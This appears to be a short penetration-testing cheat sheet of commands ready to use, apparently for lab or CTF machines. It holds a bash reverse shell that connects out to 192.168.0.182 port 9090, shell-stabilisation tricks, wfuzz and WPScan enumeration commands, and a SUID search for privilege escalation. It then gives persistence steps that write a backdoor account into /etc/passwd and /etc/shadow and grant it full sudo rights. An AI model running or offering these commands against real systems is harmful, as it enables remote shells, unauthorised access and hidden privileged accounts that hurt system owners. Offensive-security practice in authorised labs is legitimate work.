install tty using python: python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
stty raw -echo ; fg ; reset 
bash -c 'bash -i >& /dev/tcp/192.168.0.182/9090 0>&1'
----------------------------------------
WFUZZ Scan:
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$url"
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "$url"
----------------------------------------
WPScan:
wpscan --url $url --enumerate t --enumerate u -v
-----------------------------------------
SUIDS:
find / -perm -u=s -type f 2>/dev/null
-----------------------------------------
Add new User:
# choose next UID/GID (check /etc/passwd for last UID)
echo 'arfat:x:1003:1003:New User:/home/arfat:/bin/bash' >> /etc/passwd
mkdir -p /home/arfat      
cp -a /etc/skel/. /home/arfat      
chown -R 1003:1003 /home/arfat      

Set user passwd:
# generate hash (do this on a safe machine if openssl absent)
openssl passwd -1 '26472'
# copy the resulting hash and append to /etc/shadow in the form:
# arfat:<hash>:17955:0:99999:7:::
-----------------------------------------
# Edit sudoers file: 
nano /etc/sudoers
arfat   ALL=(ALL:ALL) ALL